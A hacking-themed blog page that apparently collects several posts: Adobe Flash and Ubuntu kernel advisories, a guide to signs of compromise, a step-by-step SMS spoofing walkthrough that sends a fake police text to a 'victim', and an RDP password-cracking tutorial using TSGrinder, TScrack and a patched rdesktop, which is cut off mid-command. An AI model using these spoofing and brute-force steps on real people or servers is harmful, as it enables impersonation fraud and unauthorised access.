Remote Code Execution Vulnerability in Adobe Flash Player

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxDu6dlxotmtqUKRXqJ1hEft2l0sZCmBKrCleKtNKvkF2ge1HONG_i0F9odi6uhH9vrBooZCBQoV1531Fy79_tU_Jfydvx5UaDv4wHPsSO0iGuwVOBZLDJ_p-L13HlWaPZb1h64aMzfmc/s1600/adobe-flash-remote-code-execution.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Remote Code Execution Vulnerability in Adobe Flash Player" border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxDu6dlxotmtqUKRXqJ1hEft2l0sZCmBKrCleKtNKvkF2ge1HONG_i0F9odi6uhH9vrBooZCBQoV1531Fy79_tU_Jfydvx5UaDv4wHPsSO0iGuwVOBZLDJ_p-L13HlWaPZb1h64aMzfmc/s1600/adobe-flash-remote-code-execution.png" title="Remote Code Execution Vulnerability in Adobe Flash Player" width="400" /></a></div> <br /> A <a href="http://www.hackerschronicle.com/search/label/Remote%10Code%20Execution">remote code execution</a> <a href="http://www.hackerschronicle.com/search/label/Vulnerability">vulnerability</a> has been reported in Adobe Flash Player. The vulnerability is due to a double-free condition when handling specially crafted SWF files. Successful <a href="http://www.hackerschronicle.com/search/label/Exploit">exploitation</a> would allow an attacker to take complete control of the affected system.<br /> <strong>CVE number:</strong> <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-0498">CVE-2014-0498</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-0499">CVE-2014-0499</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0502">CVE-2014-0502</a><br /> <br /> <h3> Vulnerable Versions</h3> Flash Player 12.0.0.44 and earlier versions for Windows and Macintosh <br /> Flash Player 11.2.202.336 and earlier for Linux <br /> Flash Player 12.0.0.44 and earlier for Chrome (Windows, Macintosh and Linux) <br /> Flash Player 12.0.0.44 and earlier in Internet Explorer 10 for Windows 8.0 <br /> Flash Player 12.0.0.44 and earlier in Internet Explorer 11 for Windows 8.1 <br /> AIR 4.0.0.1390 and earlier for Android <br /> AIR 4.0.0.1390 SDK & Compiler <br /> AIR 4.0.0.1390 SDK<br /> <br /> <h3> Solution</h3> Adobe recommends users update their software installations by following the instructions below:<br /> <ul> <li>Adobe recommends users of Adobe Flash Player 12.0.0.44 and earlier versions for Windows and Macintosh update to the newest version 12.0.0.70 by downloading it from the Adobe Flash Player Download Center, or via the update mechanism within the product when prompted.</li> <li>Adobe recommends users of Adobe Flash Player 11.2.202.336 and earlier versions for Linux update to Adobe Flash Player 11.2.202.341 by downloading it from the Adobe Flash Player Download Center.</li> <li>For users of Flash Player 11.7.700.261 and earlier versions for Windows and Macintosh, who cannot update to Flash Player 12.0.0.44, Adobe has made available the update Flash Player 11.7.700.269, which can be downloaded here.</li> <li>Adobe Flash Player 12.0.0.44 installed with Google Chrome will automatically be updated to the latest Google Chrome version, which will include Adobe Flash Player 12.0.0.70 for Windows, Macintosh and Linux.</li> <li>Adobe Flash Player 12.0.0.44 installed with Internet Explorer 10 will automatically be updated to the latest Internet Explorer 10 version, which will include Adobe Flash Player 12.0.0.70 for Windows 8.0.</li> <li>Adobe Flash Player 12.0.0.44 installed with Internet Explorer 11 will automatically be updated to the latest Internet Explorer 11 version, which will include Adobe Flash Player 12.0.0.70 for Windows 8.1.</li> <li>Users of the Adobe AIR 4.0.0.1390 SDK should update to the Adobe AIR 4.0.0.1628 SDK.</li> <li>Users of the Adobe AIR 4.0.0.1390 SDK & Compiler and earlier versions should update to the Adobe AIR 4.0.0.1680 SDK & Compiler.</li> <li>Users of the Adobe AIR 4.0.0.1390 and earlier versions for Android should update to Adobe AIR 4.0.0.1628 by browsing to Google play on an Android device.</li> </ul> </div>

Adobe Hacking Remote Code Execution Vulnerability Remote Code Execution Vulnerability in Adobe Flash Player

A remote code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a double-free condition whe...

Read more »

How to detect a hacker attack

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVO9MiHoA2BShqxOQ9TrA8TP83EYUyW5W2GSitvqe6PpbI-Alo8Qs4ReMfq3R4iUKT5Aqrs_lHPjUw8w_fxxC-6sxFEfh5z85DI_ORvpfXpqgWcpl8FLjfB_1E03NPqlidDsNzozyzfgJf/s1600/Hackers-attack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Detect a hacker attack" border="0" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVO9MiHoA2BShqxOQ9TrA8TP83EYUyW5W2GSitvqe6PpbI-Alo8Qs4ReMfq3R4iUKT5Aqrs_lHPjUw8w_fxxC-6sxFEfh5z85DI_ORvpfXpqgWcpl8FLjfB_1E03NPqlidDsNzozyzfgJf/s1600/Hackers-attack.jpg" title="How to detect a hacker attack" width="400" /></a></div> <br /> Most computer <a href="http://rahlabs.blogspot.in/search/label/Vulnerability" target="_blank">vulnerabilities</a> can be exploited in a variety of ways. Hacker attacks may use a single specific <a href="http://rahlabs.blogspot.in/search/label/Exploit" target="_blank">exploit</a>, several exploits at the same time, a misconfiguration in one of the system components or even a backdoor from an earlier attack. Due to this, detecting hacker attacks is not an easy task, especially for an inexperienced user. This article gives a few basic guidelines to help you figure out either if your machine is under attack or if the security of your system has been compromised. Keep in mind just like with viruses, there is no 100% guarantee you will detect a hacker attack this way. However, there's a good chance that if your system has been hacked, it will display one or more of the following behaviours. <br /> <h3> Windows machines:</h3> <ul> <li><i>Suspiciously high outgoing network traffic</i>. If you are on a dial-up account or using <b>ADSL</b> and notice an unusually high volume of outgoing network (traffic especially when you computer is idle or not necessarily uploading data), then it is possible that your computer has been compromised. Your computer may be being used either to send spam or by a network worm which is replicating and sending copies of itself. For cable connections, this is less relevant - it is quite common to have the same amount of outgoing traffic as incoming traffic even if you are doing nothing more than browsing sites or downloading data from the Internet.</li> <li><i>Increased disk activity</i> or suspicious looking files in the root directories of any drives. After hacking into a system, many hackers run a massive scan for any interesting documents or files containing passwords or logins for bank or epayment accounts such as PayPal. Similarly, some worms search the disk for files containing email addresses to use for propagation. If you notice major disk activity even when the system is idle in conjunction with suspiciously named files in common folders, this may be an indication of a system hack or malware infection.</li> <li><i>Large number of packets which come from a single address</i> being stopped by a personal firewall. After locating a target (eg. a company's IP range or a pool of home cable users) hackers usually run automated probing tools which try to use various exploits to break into the system. If you run a personal firewall (a fundamental element in protecting against hacker attacks) and notice an unusually high number of stopped packets coming from the same address then this is a good indication that your machine is under attack. The good news is that if your personal firewall is reporting these attacks, you are probably safe. However, depending on how many services you expose to the Internet, the personal firewall may fail to protect you against an attack directed at a specific FTP service running on your system which has been made accessible to all. In this case, the solution is to block the offending IP temporarily until the connection attempts stop. Many personal firewalls and IDSs have such a feature built in.</li> <li>Your resident antivirus suddenly starts reporting that <i>backdoors or trojans</i> have been detected, even if you have not done anything out of the ordinary. Although hacker attacks can be complex and innovative, many rely on known trojans or backdoors to gain full access to a compromised system. If the resident component of your antivirus is detecting and reporting such malware, this may be an indication that your system can be accessed from outside.</li> </ul> <h3> Unix machines:</h3> <ul> <li><i>Suspiciously named files</i> in the <span class="system pop">/tmp folder</span>. Many exploits in the Unix world rely on creating temporary files in the <span class="system pop">/tmp</span> standard folder which are not always deleted after the system hack. The same is true for some worms known to infect Unix systems; they recompile themselves in the <span class="system pop">/tmp</span> folder and use it as 'home'.</li> <li><i>Modified system binaries</i> such as '<span class="system pop">login</span>', '<span class="system pop">telnet</span>', '<span class="system pop">ftp</span>', '<span class="system pop">finger</span>' or more complex daemons, '<span class="system pop">sshd</span>', '<span class="system pop">ftpd</span>' and the like. After breaking into a system, a hacker usually attempts to secure access by planting a backdoor in one of the daemons with direct access from the Internet, or by modifying standard system utilities which are used to connect to other systems. The modified binaries are usually part of a rootkit and generally, are 'stealthed' against direct simple inspection. In all cases, it is a good idea to maintain a database of checksums for every system utility and periodically verify them with the system offline, in single user mode.</li> <li>Modified <span class="system pop">/etc/passwd</span>, <span class="system pop">/etc/shadow</span>, or other system files in the /etc folder. Sometimes hacker attacks may add a new user in /etc/passwd which can be remotely logged in a later date. Look for any suspicious usernames in the password file and monitor all additions, especially on a multi-user system.</li> <li><i>Suspicious services</i> added to <span class="system pop">/etc/services</span>. Opening a backdoor in a Unix system is sometimes a matter of adding two text lines. This is accomplished by modifying <span class="system pop">/etc/services</span> as well as <span class="system pop">/etc/ined.conf</span>. Closely monitor these two files for any additions which may indicate a backdoor bound to an unused or suspicious port. </li> </ul> <a href="http://securelist.com/">Source</a> </div>

Hacking Hacking Tutorials Intrusion Detection Tutorials How to detect a hacker attack

Most computer vulnerabilities can be exploited in a variety of ways. Hacker attacks may use a single specific exploit , several exploit...

Read more »

Ubuntu 13.10 Kernel Exploit

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUzKdvFGwYsPPLYutyQUQA5WqqWeneoTubm7ajR6GHLDx2fDjpWtdMVFfw0r0IiaoPWwrL18QXYDrLJuXY86Q4DupDSK1fXUR1wIh8RHJRib4C0e5B1JejWU7kH-8PG786QANPh5yxS8Xt/s1600/ubuntu+kernel+exploit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Ubuntu 13.10 Kernel Exploit" border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUzKdvFGwYsPPLYutyQUQA5WqqWeneoTubm7ajR6GHLDx2fDjpWtdMVFfw0r0IiaoPWwrL18QXYDrLJuXY86Q4DupDSK1fXUR1wIh8RHJRib4C0e5B1JejWU7kH-8PG786QANPh5yxS8Xt/s1600/ubuntu+kernel+exploit.jpg" title="Ubuntu 13.10 Kernel Exploit" width="400" /></a></div> <br /> A security issue affects Ubuntu 13.10 releases of Ubuntu and its derivatives<br /> <b>Saran Neti</b> reported a flaw in the ipv6 UDP Fragmentation Offload (UFI) in the Linux kernel. A remote attacker could exploit this flaw to cause a denial of service (panic). (<div class="highlight pop">CVE-2013-4563</div>)<br /> <b>Mathy Vanhoef</b> discovered an error in the the way the ath9k driver was handling the BSSID masking. A remote attacker could exploit this error to discover the original MAC address after a spoofing attack. (<div class="highlight pop">CVE-2013-4579</div> )<br /> <b>Andrew Honig</b> reported a flaw in the Linux Kernel's kvm_vm_ioctl_create_vcpu function of the Kernel Virtual Machine (KVM) subsystem. A local user could exploit this flaw to gain privileges on the host machine. (<div class="highlight pop">CVE-2013-4587</div>) Various other issues were also addressed.<br /> Andrew Honig reported a flaw in the apic_get_tmcct function of the Kernel Virtual Machine (KVM) subsystem if the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service or host OS system crash. (<div class="highlight pop">CVE-2013-6367</div>)<br /> Andrew Honig reported an error in the Linux Kernel's Kernel Virtual Machine (KVM) VAPIC synchronization operation. A local user could exploit this flaw to gain privileges or cause a denial of service (system crash).<br /> Source:<a href="http://www.ubuntu.com/usn/usn-2117-1/" target="_blank">Ubuntu</a> </div>

Exploit Hacking Kernel Linux News OS Ubuntu Vulnerability Ubuntu 13.10 Kernel Exploit

A security issue affects Ubuntu 13.10 releases of Ubuntu and its derivatives Saran Neti reported a flaw in the ipv6 UDP Fragmentation ...

Read more »

SMS Spoofing with Kali Linux

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZaWqW0Nr7W0f4fGzgndnUMsWs_Q9PjVXDCQlT3vpsbQXLhtiMuhKok4-Ua8x4bKl1NncsY_WmGOSqQ9sLxhn33yQs_hClDrKwqwjCcW5acFFvZHRlfRRHz5bvYme415azN0upsvfAS1E/s1600/sms-spoofing-with-kali-linux.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZaWqW0Nr7W0f4fGzgndnUMsWs_Q9PjVXDCQlT3vpsbQXLhtiMuhKok4-Ua8x4bKl1NncsY_WmGOSqQ9sLxhn33yQs_hClDrKwqwjCcW5acFFvZHRlfRRHz5bvYme415azN0upsvfAS1E/s1600/sms-spoofing-with-kali-linux.png" width="320" /></a></div> The new <a href="http://rahlabs.blogspot.in/search/label/Kali%20Linux" target="_blank" title="Kali Linux">Kali-Linux (BT6)</a> comes with many advance and increasing features and one of its incredible feature is its <a href="http://rahlabs.blogspot.in/search/label/Social%20Engineering" target="_blank" title="SMS Spoofing">SMS spoofing</a> weapon. So today we will have fun with this feature and see how easily we can spoof SMS. This is an amazing and improved feature that has made many security professionals think. Anyone can easily spoof sms from various numbers and there is no chance to be caught. This feature is located in the SET (<br /> <div class="highlight"> Social Engineering toolkit</div> ). For this go to <br /> <div class="system pop"> Applications>>Kali Linux>>Exploitation tools>>se-toolkit</div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD7LUvR5wkJHcfuwywWyS8z-qFBHF9UG5V9EYW_WHhr4FsJTukdlBovVeDhkyrUOu0ANdVsEBBkcygkc0YSXgyV6e3n0bsAINNwTTFnfriOUtGP-53xhIjXTPVNcyEQlGSLxrcFlhiU4g/s1600/sms-spoofing-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD7LUvR5wkJHcfuwywWyS8z-qFBHF9UG5V9EYW_WHhr4FsJTukdlBovVeDhkyrUOu0ANdVsEBBkcygkc0YSXgyV6e3n0bsAINNwTTFnfriOUtGP-53xhIjXTPVNcyEQlGSLxrcFlhiU4g/s1600/sms-spoofing-1.jpg" width="400" /></a></div> <strong>Next select option 7</strong>: SMS spoofing attacks<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKPPP66NzWepyjZnA3xU6EVKQefx3RBOqEsa6WU3o3Wua5UGSHw-yNzYIiVsf0912t00dtw6O9Fz8DDwQrtPNIXhedtxDOYqhTvk0LCS4YGOgz6rcoTsGsgIOOTGq7fEPXkJXj1L09psc/s1600/sms-spoofing-2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKPPP66NzWepyjZnA3xU6EVKQefx3RBOqEsa6WU3o3Wua5UGSHw-yNzYIiVsf0912t00dtw6O9Fz8DDwQrtPNIXhedtxDOYqhTvk0LCS4YGOgz6rcoTsGsgIOOTGq7fEPXkJXj1L09psc/s1600/sms-spoofing-2.jpg" width="400" /></a></div> Then <strong>select the option no 1</strong>: Perform SMS spoofing attack<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEOqd6qvxgz5361vD2fDpSNyQvWw31EuNgNis0qRxW3AaRJTRyZttO_sMxX8VET9gschrKyoYj8d0OTLspaaew9rix_uNaGio6VNthG0PM1zVpNaX5d8Wl4ZqjWuiahBRdRbygR2Jiyqs/s1600/sms-spoofing-3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEOqd6qvxgz5361vD2fDpSNyQvWw31EuNgNis0qRxW3AaRJTRyZttO_sMxX8VET9gschrKyoYj8d0OTLspaaew9rix_uNaGio6VNthG0PM1zVpNaX5d8Wl4ZqjWuiahBRdRbygR2Jiyqs/s1600/sms-spoofing-3.jpg" width="400" /></a></div> After that again <strong>select option no 1</strong>: SMS Attack single phone number<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio1qgvT7dvyG6pp4UE1q8pT2cH2L0yXTQsFd8Id2k289b5f6q1HmJZzGQP0AZg8EYqbYOAhjB3oYkKEFmlGVsuqkC_t-gsO0Z-36KcS1Q7NW_APMnE_IOXHOOvSwrymWn0jrrCSkc6bpE/s1600/sms-spoofing-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio1qgvT7dvyG6pp4UE1q8pT2cH2L0yXTQsFd8Id2k289b5f6q1HmJZzGQP0AZg8EYqbYOAhjB3oYkKEFmlGVsuqkC_t-gsO0Z-36KcS1Q7NW_APMnE_IOXHOOvSwrymWn0jrrCSkc6bpE/s1600/sms-spoofing-4.png" width="400" /></a></div> Now enter the <strong>victim’s Phone-number</strong> with its country code<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSAJEzPB30n-n28joYCd0_B2Bz8YUsW3BRBtxDEZaS9xvrEUbHTD7Fh65udmcPfPT6-Wr3TG7ubKtyRI864YJ23rB0VjZy_OG1QbSJgl5wap05Lsya6LJw1hzPGfg7FWCRfbIAWH34n9c/s1600/sms-spoofing-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSAJEzPB30n-n28joYCd0_B2Bz8YUsW3BRBtxDEZaS9xvrEUbHTD7Fh65udmcPfPT6-Wr3TG7ubKtyRI864YJ23rB0VjZy_OG1QbSJgl5wap05Lsya6LJw1hzPGfg7FWCRfbIAWH34n9c/s1600/sms-spoofing-5.png" width="400" /></a></div> Now <strong>select a template</strong> or use predefined templates as shown in below image<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYCybiCSY8_I9vobvcDbDSI9rJ9f6RtN1FjUycLOEdlKhNFldWZrDdtbk7geKnP-L8xIuVBSpl-OwAwQhjx-A4G-thP8ij9hYaA1_sW58LzhPm3Fp4_R3natojXEHaw89ofesQN9oWXNg/s1600/sms-spoofing-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYCybiCSY8_I9vobvcDbDSI9rJ9f6RtN1FjUycLOEdlKhNFldWZrDdtbk7geKnP-L8xIuVBSpl-OwAwQhjx-A4G-thP8ij9hYaA1_sW58LzhPm3Fp4_R3natojXEHaw89ofesQN9oWXNg/s1600/sms-spoofing-6.png" width="400" /></a></div> I am selecting a fake police SMS <strong>option 19</strong><br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtm9hazd8vKrnumOLZCKoeDqiJXKzO9t4KDDcOUjMBTXI7cNCGAY_PXAnYcBcLJL71MjZLEmdiJTiatrAvI_piTm7d623HOkMZexGuLmRAiwxTcmFHgPyxTNlBmiDizPRoF4t90UrUZfQ/s1600/sms-spoofing-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtm9hazd8vKrnumOLZCKoeDqiJXKzO9t4KDDcOUjMBTXI7cNCGAY_PXAnYcBcLJL71MjZLEmdiJTiatrAvI_piTm7d623HOkMZexGuLmRAiwxTcmFHgPyxTNlBmiDizPRoF4t90UrUZfQ/s1600/sms-spoofing-7.png" width="400" /></a></div> Now it’s almost done, from here you can choose the predefined <a href="http://rahlabs.blogspot.in/search/label/Android" title="Android">android </a> emulator or use your the SMS accounts. Thus, either you can start a war or stop it by sending SMS from fake locations.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivRSG7b0Lf4MKEk5YnoCH83EkIN815u9EJnMNKx-e5Uukq2Vyv0PTx0r26U9ckR2sdCbrXjVK5uiOv_q088ROOhKUEuaSoNd4vwUp052hbziFpFBmwY_-ImZLMEDR_sxRJiwMznMM1d4k/s1600/sms-spoofing-8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivRSG7b0Lf4MKEk5YnoCH83EkIN815u9EJnMNKx-e5Uukq2Vyv0PTx0r26U9ckR2sdCbrXjVK5uiOv_q088ROOhKUEuaSoNd4vwUp052hbziFpFBmwY_-ImZLMEDR_sxRJiwMznMM1d4k/s1600/sms-spoofing-8.png" width="400" /></a></div> <strong>Don't</strong> use these tricks in unethical way. Have fun! <a href="http://mile2.com/" rel="nofollow" target="_blank">Source</a><br /> <br /></div>

Backtrack Hacking Hacking Tutorials Kali Linux SMS Spoofing Social Engineering Tutorials SMS Spoofing with Kali Linux

The new Kali-Linux (BT6) comes with many advance and increasing features and one of its incredible feature is its SMS spoofing weapon. ...

Read more »

Tutorial on How to Hack Terminal Services

<div dir="ltr" style="text-align: left;" trbidi="on"> <span style="font-family: "verdana" , "sans-serif"; font-size: 8.5pt;">If you want to do any MS Terminal Server cracking you basically have your choice of three tools that can do it for you; TSgrinder, TScrack, and a patched version of RDesktop. This article and its companion Video: Terminal Server / RDP Password Cracking, takes you step-by-step through the concepts, tools and usage. <br /> <br /> </span><br /> <div class="MsoNormal" style="margin: 0in 0in 0pt;"> <span style="font-family: "verdana" , "sans-serif"; font-size: 8.5pt;">TSGrinder is readily available from <a href="http://www.hammerofgod.com/download.html" target="_blank">http://www.hammerofgod.com/download.html</a>. </span></div> <div class="MsoNormal" style="margin: 0in 0in 0pt;"> <span style="font-family: "verdana" , "sans-serif"; font-size: 8.5pt;"><br /> TSCrack you'll have to google for as it is not readily available anymore.</span></div> <span style="font-family: "verdana" , "sans-serif"; font-size: 8.5pt;"><br /> Rdesktop v1.41 can be downloaded from <a href="http://www.rdesktop.org/" target="_blank">http://www.rdesktop.org/</a> and you'll need the patch from <a href="http://foofus.net/" target="_blank">foofus.net</a> <a href="http://www.foofus.net/jmk/rdesktop.html" target="_blank">http://www.foofus.net/jmk/rdesktop.html</a>.</span><br /> <br /> <h3 align="left"> Part 1: MS Terminal Services Overview</h3> Hacking Exposed Windows Server 2003 goes a great overview, I won't plagiarize it all here, so check it out for me details and the references section of this paper for some MS references. <br /> Prior to Terminal Services, Windows did not provide the ability to run code remotely in the processor space of the server. Another way to put this is there was no way to have an "interactive" session on the server. There were tools like wsremote or psexec or VNC. If an attacker got a non administrator level account on a remote machine they could map shares and copy files but had a difficult time running code on the server. Now, with Terminal Services, an attacker can log on as a non privileged user and run exploit local exploit code via the Terminal Services GUI. These attacks used to be fairly limited to local physical attacks or from users who actually logging into your domain but now if the server has Terminal Services (2000 server 2003 server) or RDP (Windows XP) running the attack vector increases. <br /> Terminal Services by default listen on port 3389 (but can be changed by editing the registry). <br /> If you want to change the listening port, edit this registry key: <br /> <span style="font-family: "courier new" , "courier" , "mono";">\HKLM\System\CurrentControlSet\Control\Terminal Server\WinStationRDP-TCP Value : PortNUmber REG_DWORD=3389 </span> <br /> To turn on Terminal Server/RDP, edit this registry key (or to turn it on via command line): <br /> <span style="font-family: "courier new" , "courier" , "mono";">reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 </span> <br /> With this command you can enable the RDP Service. <br /> <h3> <b>Password Cracking Basics</b></h3> There are three types of password attacks: <br /> <u>Brute Force</u>: A cryptanalysis technique or other kind of attack method involving an exhaustive procedure that tries all possibilities, one-by-one. [1] For example, the program might follow a sequence like this: <br /> "aaaaaaaa"<br /> "aaaaaaab"<br /> "aaaaaaac" ... <br /> Until the password is found <br /> <u>Dictionary Attack</u>: An attack that tries all of the phrases or words in a dictionary, trying to crack a password or key. A dictionary attack uses a predefined list of words compared to a brute force attack that tries all possible combinations. [2] <br /> <u>Hybrid Attack</u>: A hybrid attack is a mixture of a brute force attach and a dictionary attack. There are many different ways a hybrid attack can be performed, in it's simplest form a hybrid attack may simply add a couple of numbers to the end of each dictionary word tried, this increases the number of tested combinations without having to resort to a true brute force attack. Cracking software will often use a combination or selection of all three methods to try and guess your password. [3] <br /> <h3> Terminal Services Enumeration</h3> You can google for "/TSWeb/default.htm" <br /> <br /> Figure 1.1: Output of a google search for /TSWeb/default.htm <br /> You can nmap for port 3389 <br />   <br /> Figure 1.2: A Nmap scan looking for port 3389 open on the Class C. <br /> <br /> Figure 1.3: Results on the Nmap Scan looking for open port 3389. <br /> You can use ProbeTS (<a href="http://www.hammerofgod.com/download/probets.zip" target="_blank">http://www.hammerofgod.com/download/probets.zip</a>): <br />   <br /> Figure 1.4: The output of probeTS. <br /> <h3> Terminal Services Connections</h3> Let's see what a regular Terminal Services connection looks like. <br />   <br /> Figure 1.5: the Terminal Services/RDP Client on Windows 2000 Pro to a Windows 2000 Terminal Server. <br /> <br /> Figure 1.6: Issuing a command over the Terminal Services Client. <br /> <h3> Part 2: TSGrinder</h3> From the TSGrinder website:<br /> "TSGrinder is the first production Terminal Server bruteforce tool. The main idea here is that the Administrator account, since it cannot be locked out for local logons, can be brute forced. Also having an encrypted channel to the TS logon process sure helps to keep IDS from catching the attempts. <br /> TSGrinder is a "dictionary" based attack tool, but it does have some interesting features like "l337" conversion, and supports multiple attack windows from a single dictionary file. It supports multiple password attempts in the same connection, and allows you to specify how many times to try a username/password combination within a particular connection. <br /> Also, the problem you describe can be exacerbated in that administrator account can be brute-forced without creating a log entry, by attempting 5 logons and disconnecting before Windows disconnects and logs after the sixth failure." <br /> Let's see TSGrinder in action. I had to use the Windows XP RDP client on Windows2000 SP4 to get TSGrinder to work properly. I did not need roboclient.zip that it mentions on the website. <br />   <br /> Figure 2.1: TSGrinder being run with no arguments. <br />   <br /> Figure 2.2: TSGrinder using a dictionary attack against the administrator account. <br />   <br /> Figure 2.3: A failed attempt. <br /> <br /> Figure 2.4: if TSGrinder guesses the password it will log into the terminal services and immediately disconnect. <br />   <br /> Figure 2.5: A successful attempt with TSGrinder. <br /> <br /> Figure 2.6: TSGrinder supports 2 threads. Here you can see two threads running the attack. <br /> <br /> Figure 2.7: A successful attempt with TSGrinder that used 2 threads to run the attack. <br /> <h3> Part 3: TScrack</h3> From the TScrack documentation:<br /> "The Windows Terminal Services facility offers graphical desktop sessions to remote clients. Terminal Services enables users to work in a windows session that exists on the server. The client functionality is basically reduced to the functionality of a terminal, all it does is display the session screen, and collect user input. <br /> TScrack applies AI technology (Artificial Neural Networks) to scrape the screen contents of the graphical logon, in order to enable a simple dictionary based cracking algorithm to perform efficiently against the graphically presented logon dialogs and message boxes. <br /> This is very similar to the technology used i.e. in Optical Character Recognition (OCR), Face- and Image recognition in general. <br /> TScrack was written for two purposes: <br /> a) To provide a tool to assess password security of MS RDP servers<br /> b) As proof of concept code, to point out that graphical logons are by no means secure from automated cracking / password guessing tools <br />   <br /> Figure 3.1: TScrack being run with no arguments. <br /> <br /> Figure 3.2: TScrack being run against a Windows Server 2003 Terminal Server <br /> <br /> Figure 3.3: TScrack successfully cracking the password <br /> <br /> Figure 3.4: TScrack also does multithreading cracking, use the –t option for 2 connections <br />   <br /> Figure 3.5: TScrack with two simultaneous connections running <br /> <br /> Figure 3.6: TScrack successfully cracking the password <br /> TScrack was updated to v2.1 to include brute force attacks (something TSGrinder does not do). <br /> <br /> Figure 3.7: TScrack in Brute force mode (-B option & max word length of 6) <br /> **Note 1: I attempted to use the –N (no logging option). Windows Server 2003 still logged every failed attempt to log on (which is good). <br /> <br /> Figure 3.8: TScrack in Brute force mode with the –N (no logging) option <br /> <br /> Figure 3.9: Even with –N enabled Windows Server 2003 logged the attempts. I did not test every configuration on every type of OS, I just noticed it was logging the attempt and shared the info. <br /> **Note 2: I also had to drastically change the default password policy on Server 2003 to put an easy to crack password. I chose a password of "chrisg" as the password I wanted to brute force. <br /> <br /> Figure 3.10: Here is the default password policy for Windows Server 2003 <br /> <br /> Figure 3.11: What I changed the password policy to, to allow "chrisg" as a password <br /> **Note 3: I had to run TScrack 2.1 on windows 2000 machine; it wasn't working properly on Windows XP SP2. Also, If you are getting a MSRDP.OCX error, then uninstall TScrack using the "-U" option then reinstalling by issuing TScrack.exe –h. <br /> <h3> Part 4: Rdesktop & BruteForcing RDP with Rdesktop patch</h3> Download rdesktop version 1.41 from the website: <br /> <a href="http://www.rdesktop.org/%20" target="_blank">http://www.rdesktop.org/%20</a><br /> <a href="http://prdownloads.sourceforge.net/rdesktop/rdesktop-1.4.1.tar.gz?download%20" target="_blank">http://prdownloads.sourceforge.net/rdesktop/rdesktop-1.4.1.tar.gz?download%20</a> <br /> Download the rdp-bruteforce patch from <a href="http://foofus.net/" target="_blank">foofus.net</a>: <br /> <a href="http://www.foofus.net/jmk/rdesktop.html%20" target="_blank">http://www.foofus.net/jmk/rdesktop.html%20</a><br /> <a href="http://www.foofus.net/jmk/tools/rdp-brute-force-r422.diff%20" target="_blank">http://www.foofus.net/jmk/tools/rdp-brute-force-r422.diff%20</a> <br /> Paste the patch into the source directory and apply the patch <br /> <span style="font-family: "courier new" , "courier" , "mono";">SegFault:/Users/chrisgates/Desktop root# cd rdesktop-1.4.1<br /> SegFault:/Users/chrisgates/Desktop/rdesktop-1.4.1 root# patch -p1 -i rdp-brute-force-r422.diff<br /> patching file orders.c<br /> patching file orders.h<br /> patching file rdesktop.c<br /> patching file rdesktop.h<br /> patching file rdp.c<br /> patching file secure.c<br /> 